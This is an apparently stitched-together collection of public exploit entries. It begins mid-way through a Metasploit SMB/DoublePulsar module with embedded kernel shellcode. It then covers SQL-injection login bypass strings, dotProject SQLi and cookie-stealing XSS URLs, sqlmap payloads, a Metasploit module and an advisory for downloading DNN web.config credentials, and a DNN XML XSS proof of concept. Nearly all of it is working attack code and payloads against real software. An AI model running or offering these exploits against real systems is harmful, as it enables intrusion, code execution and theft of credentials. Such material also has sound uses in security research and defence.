pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc007
@multiplex_id = rand(0xffff)
pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
pkt['Payload']['SMB'].v['TreeID'] = @tree_id
pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.to_s.length
pkt['Payload'].v['ParamCountMax'] = 1
pkt['Payload'].v['DataCountMax'] = 0
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.to_s.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)
pkt['Payload'].v['Payload'] = data
pkt.to_s
end
# ring3 = user mode encoded payload
# proc_name = process to inject APC into
def make_kernel_user_payload(ring3, proc_name)
sc = make_kernel_shellcode(proc_name)
sc << [ring3.length].pack("S<")
sc << ring3
sc
end
def generate_process_hash(process)
# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
proc_hash = 0
process << "\x00"
process.each_byte do |c|
proc_hash = ror(proc_hash, 13)
proc_hash += c
end
[proc_hash].pack('l<')
end
def ror(dword, bits)
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
end
def make_kernel_shellcode(proc_name)
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
# Length: 780 bytes
"\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" +
"\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" +
"\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" +
"\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" +
"\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" +
"\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" +
"\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" +
"\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" +
"\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" +
"\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" +
"\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" +
"\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" +
"\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
generate_process_hash(proc_name.upcase) +
"\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" +
"\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" +
"\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" +
"\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" +
"\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" +
"\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" +
"\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" +
"\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" +
"\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" +
"\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" +
"\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" +
"\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" +
"\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" +
"\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" +
"\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" +
"\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" +
"\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" +
"\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" +
"\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" +
"\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" +
"\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" +
"\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" +
"\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" +
"\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" +
"\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" +
"\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" +
"\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" +
"\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" +
"\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" +
"\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" +
"\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" +
"\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" +
"\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" +
"\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
end
def kernel_shellcode_size
make_kernel_shellcode('').length
end
end
# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
# Date: 2018-12-08
# Exploit Author: Veyselxan
# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
# Version: v1 (REQUIRED)
# Tested on: Linux
http://traget/admin/index.php
username: '=''or'
Password: '=''or'
source: https://www.securityfocus.com/bid/56624/info
Dotproject is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. Multiple cross-site scripting vulnerabilities
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dotproject versions prior to 2.1.7 are vulnerable.
http://www.example.com/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
http://www.example.com/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%2 0INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
http://www.example.com/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202
http://www.example.com/?m=projects&update_project_status=1&project_status=1&project_id[]=%27%20UNION%20SELECT %20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
http://www.example.com/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%2 0%27/tmp/file.txt%27%20--%202
source: https://www.securityfocus.com/bid/56624/info
Dotproject is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. Multiple cross-site scripting vulnerabilities
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dotproject versions prior to 2.1.7 are vulnerable.
http://www.example.com/?m=public&a=color_selector&callback=%3C/script%3E%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://www.example.com/?m=public&a=date_format&field=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://www.example.com/index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseove r=%22javascript:alert%28document.cookie%29%22
http://www.example.com/index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%28document.cookie%29%2 2
# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc)
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://dotproject.net
# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip
# Version: 2.1.9
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves.
==================================================================
event_id (POST) - Sql injection PoC
POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1
Host: xxx.xxx.x.xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1
dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&
event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&
end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
Parameter: event_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
==================================================================
MULTIPART project_id ((custom) POST) - Sql Injection Poc
POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit
Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620
Content-Length: 2749
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="dosql"
do_project_aed
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_id"
[SQLi]
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_creator"
1
.
..snip
..snip
.
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="import_tasks_from"
0
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_description"
fasdf
-----------------------------9310663371787104596119761620--
Parameter: MULTIPART project_id ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)
#
#
#
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
# using System;
# using System.IO;
# using System.Web.SessionState;
# using System.Web.UI;
#
# public class DownloadProvider : Page, IRequiresSessionState
# {
# protected void Page_Load(object sender, EventArgs e)
# {
# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
# {
# string path = base.Request.QueryString["File"];
# string fileName = Path.GetFileName(path);
# base.Response.ContentType = "application/octet-stream";
# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
# base.Response.WriteFile(path);
# base.Response.End();
# }
# }
# }
# }
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
'Description' => %q{
This module exploits an unauthenticated arbitrary file download vulnerability in DNN
DreamSlider version 01.01.02 and below.
},
'Author' =>
[
'Glafkos Charalambous', # Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'DisclosureDate' => 'Mar 23 2015'))
register_options(
[
Opt::RPORT(80),
OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
'cookie' => datastore['Cookie'],
})
if res && res.code == 200 and res.body.to_s =~ /Download Provider/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
end
def run
begin
print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
'cookie' => datastore['Cookie'],
})
rescue Rex::ConnectionError
print_error("#{peer} - Could not connect.")
return
end
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
return
end
fileName = datastore['FILENAME']
path = store_loot(
'ds.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fileName
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Failed to download file.")
end
end
end
##############################
01. ### Advisory Information ###
Title: Directory Traversal Vulnerability in DNNarticle module
Date published: n/a
Date of last update: n/a
Vendors contacted: zldnn.com
Discovered by: Esmaeil Rahimian
Severity: Critical
02. ### Vulnerability Information ###
OVE-ID: CVE-2018-9126.
03. ### Introduction ###
DNN Article is not only a powerful module to enable post and manage
articles, but also provides total solutions for content management. Content
such as articles, news, announcements, product catalogs, etc can be
organized into unlimited levels of categories. New content can be moderated
before published. The administrator can assign roles as moderator. Also an
email can be sent when new content is added. Visitors can make comment and
rating. They can also agree or disagree an article. The product supports
common features of DotNetNuke module such as localization, portable
interface, search, Syndication etc. It can integrate with Twitter,
Facebook, Google Map, Windows Live Writer and DotNetNuke Journal to provide
more powerful functions for your portals. DNNArticle is an extendable
system. There are several sub modules shipped with DNNArticle standard
edition to provide rich and attractive look and feel experiences. There are
also several optional sub modules that provide more features. And the
number of optional sub modules is growing continually. There are also
several applications based on DNNArticle such as DNNArticle Blog and
DNNArticle Product. DNNArticle fully supports template and CSS theme. This
feature provides more flexibility for users to build more attractive user
interface.
zldnn.com
04. ### Vulnerability Description ###
The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote
attackers to read the web.config file, and consequently
discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
05. ### Technical Description / Proof of Concept Code ###
desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3
with this link the attacker can see the web.config file and find DB name
and see the user name and passwords of DB
06. ### Affected Product Code Base ###
DnnArticle Module for DotNet Nuke - 11
Affected Component:
DNNArticle Module
[Attack Type]
Remote
[Impact Information Disclosure]
True
[Attack Vectors]
Attacker can see the web.config file that contain critical information
06. ### Credits ###
SecureHost[Research Team] - www.securehost.co
This vulnerability has been discovered by:
Esmaeil Rahimian - [www.securehost.co] - Rahimian(at)SecureHost(dot)co
# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user’s browser.
In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as <script>.
For instance, uploading the following code as an XML file executes javascript and shows a non-harmful ‘XSS’ alert.
<?xml version="1.0" encoding="UTF-8"?>
<script xmlns="http://www.w3.org/1999/xhtml">
alert('XSS');
</script>
Though stealing of authentication cookies are not possible at this time (because the authentication’s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users’ cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.